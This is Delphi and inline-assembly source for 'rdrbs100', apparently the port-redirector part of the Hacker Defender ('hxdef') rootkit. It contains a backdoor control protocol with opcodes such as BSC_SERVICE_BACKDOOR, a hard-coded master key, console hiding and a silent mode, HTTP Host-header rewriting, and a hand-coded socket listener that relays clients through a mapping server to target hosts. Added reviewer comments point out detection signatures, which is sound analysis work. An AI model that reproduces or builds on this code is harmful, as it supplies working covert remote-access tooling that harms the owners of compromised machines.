program rdrbs100;
{$APPTYPE CONSOLE}
uses Windows,USysUtils,ShellAPI,Winsock2,UList,UTCP;
{$R rdrbs100.res}
const
// Window class name of the program's own (presumably hidden, tray-backed) window.
// Being a fixed literal compiled into every copy, it is also a static artifact
// that host-based scanners can key on.
WindowClassName='hxdef-rdrbase-100';
// Win32 message ids redeclared locally (WM_QUIT / WM_LBUTTONDBLCLK / WM_USER
// carry their standard values); the WM_USER+n ids are private to this program.
WM_QUIT = $0012;
WM_LBUTTONDBLCLK = $0203;
WM_USER = $0400;
WM_TRAYNOTIFY = WM_USER+1;      // tray-icon callback message (see NotifyIconData)
WM_TRAY_END = WM_TRAYNOTIFY+1;
WM_HIDECONSOLE = WM_TRAY_END+1; // pairs with the HIDE console command
WM_MAX = WM_USER+10;            // upper bound of the private message range
MaxMappedPorts = 1000;          // cap on mapped-port entries; enforcement is not in this excerpt
// Values of TMappedPort.PortType. ptHTTP entries additionally carry a Domain
// (the ADD command's usage text says so), used to rewrite the Host header.
ptUnknown = 0;
ptNormal = 1;
ptHTTP = 2;
WAITFOREVENTSTIMEOUT=250;       // ms; timeout handed to WSAWaitForMultipleEvents in the listener loop
SOCK_ADDR_SIZE=SizeOf(TSockAddrIn);
MASTER_KEY_LEN=32;              // byte length of MasterKey (declared in the var section below)
// One-byte opcodes ($E0..$EF) of the control protocol spoken with the peer.
// The dispatch code is not in this excerpt; the names suggest a three-step
// INIT handshake, console I/O relay, an authorization result, service
// selection (backdoor / redirector / test) and an end-of-session request.
// The contiguous, fixed opcode range is a useful network-detection feature.
BSC_INIT_REQ_1 =$E0;
BSC_INIT_RES_1 =$E1;
BSC_INIT_REQ_2 =$E2;
BSC_INIT_RES_2 =$E3;
BSC_INIT_REQ_3 =$E4;
BSC_INIT_RES_3 =$E5;
BSC_INIT_COMPLETE =$E6;
BSC_CONSOLE_INPUT =$E7;
BSC_CONSOLE_OUTPUT =$E8;
BSC_AUTHORIZATION_OK =$E9;
BSC_AUTHORIZATION_FAILED =$EA;
BSC_SERVICE_BACKDOOR =$EB;
BSC_SERVICE_REDIRECTOR =$EC;
BSC_SERVICE_TEST_REQ =$ED;
BSC_SERVICE_TEST_RES =$EE;
BSC_END_REQ =$EF;
type
// One entry of the interactive console's command table: the keyword, the
// one-line description shown by HELP, and the argument usage string.
TCommand=record
Name,Info,Usage:string;
end;
const
CommandsCount=19;               // must equal the number of entries in CommandList
// Console command table. Usage strings use <...> for required and [...] for
// optional arguments. NOTE(review): the SUEDIT usage ' [ON|OFF]' looks copied
// from SILENT; the other startup-list commands take ' <INDEX>' -- confirm.
CommandList:array[1..CommandsCount] of TCommand=
(
(Name:'HELP';Info:'List of commands or command details.';Usage:' [COMMAND]'),
(Name:'EXIT';Info:'Kill this application. Use DIS flag to discard unsaved data.';Usage:' [DIS]'),
(Name:'CLS';Info:'Clear screen buffer.';Usage:''),
(Name:'SAVE';Info:'Save settings.';Usage:''),
(Name:'LIST';Info:'List mapped ports.';Usage:' [PAGE INDEX]'),
(Name:'OPEN';Info:'Open mapped port.';Usage:' <INDEX>'),
(Name:'CLOSE';Info:'Close mapped port.';Usage:' <INDEX>'),
(Name:'HIDE';Info:'Hide this console. (NT Only)';Usage:''),
(Name:'MPINFO';Info:'Show number of mapped and open ports.';Usage:''),
(Name:'ADD';Info:'Create mapped port. You have to specify domain when using HTTP type.';Usage:' <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]'),
(Name:'DEL';Info:'Delete mapped port.';Usage:' <INDEX>'),
(Name:'DETAIL';Info:'More info about mapped port.';Usage:' <INDEX>'),
(Name:'SULIST';Info:'List startup commands.';Usage:' [PAGE INDEX]'),
(Name:'SUADD';Info:'Add startup command.';Usage:' <INDEX>'),
(Name:'SUDEL';Info:'Delete startup command.';Usage:' <INDEX>'),
(Name:'SILENT';Info:'Display or change silent mode.';Usage:' [ON|OFF]'),
(Name:'EDIT';Info:'Edit mapped port.';Usage:' <INDEX>'),
(Name:'SUEDIT';Info:'Edit startup command.';Usage:' [ON|OFF]'),
(Name:'TEST';Info:'Test mapping server.';Usage:' <INDEX>')
);
type
// One console cell: a character plus its attribute word, with a Unicode and an
// ANSI view of the same storage (the same two-field shape as the Win32
// CHAR_INFO union; presumably used to snapshot the console, see ConsoleScreenBuffer).
TCharInfoEx=record
case Byte of
0:(UnicodeChar:WCHAR;
UAttributes:Word);
1:(AsciiChar:CHAR;
AAttributes:Word);
end;
TConsoleScreen=array[0..24,0..79] of TCharInfoEx;  // 25 rows x 80 columns
// Persisted settings (SAVE command); only the silent-mode flag so far.
TSettings=record
SilentMode:Boolean;
end;
PMappedPort=^TMappedPort;
// One port mapping as entered with the ADD command: a local listen port, the
// mapping server and the final target server, plus credentials and type.
TMappedPort=record
// ID:array[0..3] of Char;
LocalListenPort:Word;           // <LOCAL PORT>
MappingServer:TInAddr;          // <MAPPING SERVER> (already resolved to an address)
MappingServerPort:Word;         // <MAPPING SERVER PORT>
TargetServer:TInAddr;           // <TARGET SERVER>
TargetServerPort:Word;          // <TARGET SERVER PORT>
AuthNum:Cardinal;               // passed through to AddRedir; how it is derived is not in this excerpt
Password:array[0..15] of Char;  // <PASSWORD>, fixed 16 bytes. NOTE(review): held in cleartext in memory and, presumably, in the saved settings -- confirm
PortType:Word;                  // ptUnknown / ptNormal / ptHTTP
Domain:string;                  // [DOMAIN]; only meaningful for ptHTTP
Opened:Longbool;                // true while the mapping is active (OPEN / CLOSE commands); Longbool keeps it 4 bytes wide
end;
PStartupItem=^TStartupItem;
TStartupItem=array[0..1023] of Char;  // one startup command line, fixed 1 KiB buffer
// OS detection results; how they are determined is not in this excerpt.
TWindowsVersion=(wvUnknown,wvWin32s,wvWindowsNT40,wvWindows95,wvWindows95OSR2,wvWindows98,wvWindows98SE,wvWindows2000,wvWindowsMe,wvWindowsXP);
TWindowsType=(wtUnknown,wtWin32s,wtWxx,wtNT);
var
NotifyIconData:TNotifyIconData; // tray icon registration data
WindowClass:TWndClass;          // class record for the program's own window (WindowClassName)
Icon:HICON;
// Process-wide state flags; ReadThread* refer to the console reader thread.
IsConsole,ReadThreadExists,AppRun,ReadThreadSuspened,IniLoaded,SilentNow:Boolean;
ConsoleScreenBuffer:TConsoleScreen;   // saved copy of the console contents
ConsoleCursorInfo:TConsoleCursorInfo;
ConsoleScreenBufferInfo:TConsoleScreenBufferInfo;
WindowHandle,InputHandle,OutputHandle,ReadThreadHandle:THandle;
FirstCoords,SecondCoords:TCoord;
FirstRect:TSmallRect;
IniFile:string;                 // path of the settings file (SAVE / IniLoaded)
Settings:TSettings;
MappedPorts,StartupList:TList;  // lists of PMappedPort and PStartupItem respectively
Msg:TMsg;
WSAData:TWSAData;
WindowsVersion:TWindowsVersion;
WindowsType:TWindowsType;
// 32-byte key baked into the binary. Its use (presumably the BSC_INIT
// exchange) is outside this excerpt. Because it is identical in every copy it
// gives no per-deployment secrecy and serves as a reliable static signature.
MasterKey:array[0..MASTER_KEY_LEN-1] of Char=#$01#$9A#$8C#$66#$AF#$C0#$4A#$11
+#$9E#$3F#$40#$88#$12#$2C#$3A#$4A
+#$84#$65#$38#$B0#$B4#$08#$0B#$AF
+#$DB#$CE#$02#$94#$34#$5F#$22#$00;
// Replace the value of the first "Host:" header in an HTTP request buffer.
// In/out: VBuffer, VSize - the packet and its byte length. The block must have
//         been obtained with LocalAlloc: on a match it is LocalFree'd and
//         replaced by a fresh LMEM_FIXED block holding the edited packet.
// In:     ADomain - pointer to the replacement host name; it is cast straight
//         to string below, so it must be a valid Delphi long-string pointer.
// Only a header that follows a CRLF and is spelled exactly "Host: " (one
// space) is matched; the match is case-insensitive via a string UpCase, which
// must come from USysUtils (the RTL UpCase takes a single Char). Without a
// match the buffer is left untouched.
procedure ReplaceHostInHTTPPacket(var VBuffer:Pointer;var VSize:Cardinal;ADomain:Pointer);stdcall;
var
LBuf,LNew,LDom:string;          // LBuf: packet copy, later its tail; LNew: rebuilt packet
LPos:Integer;
begin
LDom:=string(ADomain);          // cast, not a copy: LDom aliases ADomain's memory
SetLength(LBuf,VSize);
CopyMemory(Pointer(LBuf),VBuffer,VSize);   // work on a string copy of the raw bytes
LPos:=Pos(#$0D#$0A+'HOST: ',UpCase(LBuf)); // LPos = index of the CR; the match is 8 chars (CR LF H O S T : space)
if LPos>0 then
begin
LNew:=Copy(LBuf,1,LPos+7)+LDom; // everything up to and including the space after "Host:", then the new host
LBuf:=Copy(LBuf,LPos+7,MaxInt); // tail from that space: old host value and the rest of the packet
LPos:=Pos(#$0D#$0A,LBuf);       // CRLF that ends the Host line
if LPos>0 then LNew:=LNew+Copy(LBuf,LPos,MaxInt);  // keep CRLF + remaining headers/body
// NOTE(review): if the Host line is not CRLF-terminated the tail is dropped here.
LocalFree(Cardinal(VBuffer));   // 32-bit pointer assumed; old block is gone before the new one is known to exist
VSize:=Length(LNew);
VBuffer:=Pointer(LocalAlloc(LMEM_FIXED,VSize));  // NOTE(review): a nil result is not checked before the copy
CopyMemory(VBuffer,Pointer(LNew),VSize);
end;
end;
procedure AddRedir(AListenPort:Cardinal;AMappingAddr:TInAddr;AMappingPort:Cardinal;ATerminator:Pointer;ATargetServer:TInAddr;ATargetPort:Cardinal;APortType:Cardinal;ADomain:Pointer;AAuthNum:Cardinal); stdcall; assembler;
asm
push dword ptr [ebp+028h]
push dword ptr [ebp+024h]
push dword ptr [ebp+020h]
push dword ptr [ebp+01Ch]
push dword ptr [ebp+018h]
push dword ptr [ebp+014h]
mov eax,[ebp+010h]
shl eax,010h
mov ax,[ebp+008h]
push eax
push dword ptr [ebp+00Ch]
call @Server
leave
ret 024h
@Server:
push ebp
mov ebp,esp
sub esp,034h
{
-030 - NewClient.Host.sin_family:Word
-02E - NewClient.Host.sin_port:Word
-02C - NewClient.Host.sin_addr:TInAddr
-028..-024 - NewClient.Host.sin_zero:array[0..7] of Char
-020 - NewClient.Socket:TSocket
-01C - TID:Cardinal;
-018 - ServerEventHandle:THandle
-014 - ServerHost.sin_family:Word
-012 - ServerHost.sin_port:Word
-010 - ServerHost.sin_addr:TInAddr
-00C..-008 - ServerHost.sin_zero:array[0..7] of Char
-004 - ServerSocket:TSocket
+008 - MappingServerAddr:TInAddr
+00C - ListenPort:Word
+00E - MappingServerPort:Word
+010 - Terminator:PBoolean
+014 - TargetServerAddr:TInAddr
+018 - TargetServerPort:Cardinal
+01C - PortType:Carindal
+020 - PortDomain:string
+024 - AuthNum:Cardinal
}
push esi
push edi
push ebx
xor eax,eax
mov [ebp-010h],eax
push eax
push eax
push eax
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call WSASocket
mov [ebp-004h],eax
inc eax
jz @Server_end
mov eax,[ebp+00Ch]
xchg ah,al
mov [ebp-012h],ax
mov word ptr [ebp-014h],AF_INET
push 010h
lea eax,[ebp-014h]
push eax
push dword ptr [ebp-004h]
call bind
inc eax
jz @Server_end
push SOMAXCONN
push dword ptr [ebp-004h]
call listen
jnz @Server_end
@Server_loop:
lea eax,[ebp-018h]
push eax
push [ebp-004h]
call @EventSelect
test eax,eax
jz @Server_end
push [ebp-018h]
push [ebp-004h]
call @WaitForEvents
test eax,eax
jnz @Server_proc_events
mov eax,[ebp+010h]
mov eax,[eax]
test eax,eax
jz @Server_end
push 019h
call Sleep
jmp @Server_loop
@Server_proc_events:
and eax,FD_ACCEPT
jz @Server_loop
xor eax,eax
push eax
push eax
push eax
lea eax,[ebp-030h]
push eax
push dword ptr [ebp-004h]
call WSAAccept
mov [ebp-020h],eax
inc eax
jz @Server_loop
push 030h
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @Server_close_newsock
mov ecx,[ebp-020h]
mov [eax],ecx
lea esi,[ebp-030h]
lea edi,[eax+004h]
movsd
movsd
movsd
movsd
lea esi,[ebp+008h]
movsd
movsd
add esi,004h
push 005h
pop ecx
rep movsd
lea edx,[ebp-01Ch]
push edx
push ecx
push eax
push offset @NewClientThread
push ecx
push ecx
call CreateThread
jmp @Server_loop
@Server_close_newsock:
push dword ptr [ebp-020h]
call CloseSocket
jmp @Server_loop
@Server_end:
push 050h
call Sleep
mov eax,[ebp+010h]
push 000h
pop dword ptr [eax]
push dword ptr [ebp-018h]
call WSACloseEvent
push dword ptr [ebp-004h]
call CloseSocket
leave
ret 008h
@EventSelect:
call WSACreateEvent
test eax,eax
jz @EventSelect_fail
mov ecx,[esp+008h]
mov [ecx],eax
push FD_ALL_EVENTS
push eax
push [esp+00Ch]
call WSAEventSelect
inc eax
jnz @EventSelect_end
@EventSelect_fail:
xor eax,eax
@EventSelect_end:
ret 008h
@WaitForEvents:
push ebp
mov ebp,esp
sub esp,02Ch
//LFucker
{ push 0109h //Lfucker
call Sleep //Lfucker}
call @PeekMessages
{ @WaitForEvents_PM_loop:
push PM_REMOVE
push 000h
push 000h
push 000h
lea eax,[ebp-02Ch]
push eax
call PeekMessageA
test eax,eax
jnz @WaitForEvents_PM_loop}
//LFucker
push 000h
push WAITFOREVENTSTIMEOUT
push 000h
lea eax,[ebp+00Ch]
push eax
push 1
call WSAWaitForMultipleEvents
inc eax
jz @WaitForEvents_end
sub eax,WSA_WAIT_TIMEOUT+1
jz @WaitForEvents_end
lea eax,[ebp-02Ch]
push eax
push dword ptr [ebp+00Ch]
push dword ptr [ebp+008h]
call WSAEnumNetworkEvents
inc eax
jz @WaitForEvents_end
mov eax,[ebp-02Ch]
@WaitForEvents_end:
leave
jmp @EventSelect_end
@NewClientThread:
mov ebp,esp
sub esp,070h
{
-070 - RedirThreadHandle:THandle
-06C - ClientThreadHandle:THandle
-068 - Redir.ThreadArgs.MainItem:PTcpItem
-064 - Redir.ThreadArgs.OtherItem:PTcpItem
-060 - Redir.ThreadArgs.ThreadType:Cardinal
-05C - Redir.ThreadArgs.Events:Longint
-058 - Redir.ThreadArgs.EventHandle:THandle
-054 - Redir.ThreadArgs.Active:Boolean
-050 - Redir.ThreadArgs.Host.sin_family:Word
-04E - Redir.ThreadArgs.Host.sin_port:Word
-04C - Redir.ThreadArgs.Host.sin_addr:TInAddr
-048..-044 - Redir.ThreadArgs.Host.sin_zero:array[0..7] of Char
-040 - Redir.ThreadArgs.Socket
-038 - Redir.ThreadID:Cardinal
-034 - Client.ThreadArgs.MainItem:PTcpItem
-030 - Client.ThreadArgs.OtherItem:PTcpItem
-02C - Client.ThreadArgs.ThreadType:Cardinal
-028 - Client.ThreadArgs.Events:Longint
-024 - Client.ThreadArgs.EventHandle:THandle
-020 - Client.ThreadArgs.Active:Boolean
-01C - Client.ThreadArgs.Host.sin_family:Word
-01A - Client.ThreadArgs.Host.sin_port:Word
-018 - Client.ThreadArgs.Host.sin_addr:TInAddr
-014..-010 - Client.ThreadArgs.Host.sin_zero:array[0..7] of Char
-00C - Client.ThreadArgs.Socket
-008 - Client.ThreadArgs.Connected
-004 - Client.ThreadID:Cardinal
+004 - AArgs:Pointer
+000 AArgs.NewSocket
+004 AArgs.NewHost.sin_family:Word
+006 AArgs.NewHost.sin_port:Word
+008 AArgs.NewHost.sin_addr:TInAddr
+00C..+010 AArgs.NewHost.sin_zero:array[0..7] of Char
+014 AArgs.MappingServerAddr:TInAddr
+018 AArgs.ListenPort:Word
+01A AArgs.MappingServerPort:Word
+01C AArgs.TargetServerAddr
+020 AArgs.TargetServerPort
+024 AArgs.PortType
+028 AArgs.Domain
+02C AArgs.AuthNum
}
xor eax,eax
lea edi,[ebp-070h]
push 01Ch
pop ecx
rep stosd
push eax
push eax
push eax
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call WSASocket
mov [ebp-00Ch],eax
inc eax
jz @NewClientThread_close_newsock
push 001h
pop eax
mov [ebp-020h],eax
mov [ebp-054h],eax
mov [ebp-060h],eax
mov edx,[ebp+004h]
movzx eax,word ptr [edx+01Ah]
xchg ah,al
mov [ebp-01Ah],ax
mov word ptr [ebp-01Ch],AF_INET
mov eax,[edx+014h]
mov [ebp-018h],eax
mov eax,[edx]
mov [ebp-040h],eax
lea esi,[edx+004h]
lea edi,[ebp-050h]
movsd
movsd
movsd
movsd
lea eax,[ebp-058h]
push eax
push dword ptr [ebp-040h]
call @EventSelect
test eax,eax
jz @NewClientThread_close_clientsock
lea eax,[ebp-068h]
mov [ebp-030h],eax
mov [ebp-068h],eax
lea eax,[ebp-034h]
mov [ebp-034h],eax
mov [ebp-064h],eax
lea eax,[ebp-004h]
push eax
push 000h
lea eax,[ebp-034h]
push eax
push offset @ThreadProc
push 000h
push 000h
call CreateThread
test eax,eax
jz @NewClientThread_close_clientsock
mov [ebp-06Ch],eax
push 019h
call Sleep
lea eax,[ebp-038h]
push eax
push 000h
lea eax,[ebp-068h]
push eax
push offset @ThreadProc
push 000h
push 000h
call CreateThread
test eax,eax
jz @NewClientThread_term_clientthread
mov [ebp-070h],eax
push -001h
push 000h
lea eax,[ebp-070h]
push eax
push 2
call WaitForMultipleObjects
xor eax,eax
mov [ebp-054h],eax
mov [ebp-020h],eax
mov [ebp-008h],eax
push 032h
call Sleep
push dword ptr [ebp-040h]
call CloseSocket
push dword ptr [ebp-00Ch]
call CloseSocket
push 0FAh
call Sleep
push 000h
push dword ptr [ebp-070h]
call TerminateThread
@NewClientThread_term_clientthread:
push 000h
push dword ptr [ebp-06Ch]
call TerminateThread
@NewClientThread_close_clientsock:
push dword ptr [ebp-00Ch]
call CloseSocket
push dword ptr [ebp-058h]
call CloseHandle
push dword ptr [ebp-024h]
call CloseHandle
@NewClientThread_close_newsock:
mov eax,[ebp+004h]
push dword ptr [eax]
call CloseSocket
push dword ptr [ebp+004h]
call LocalFree
push 000h
call ExitThread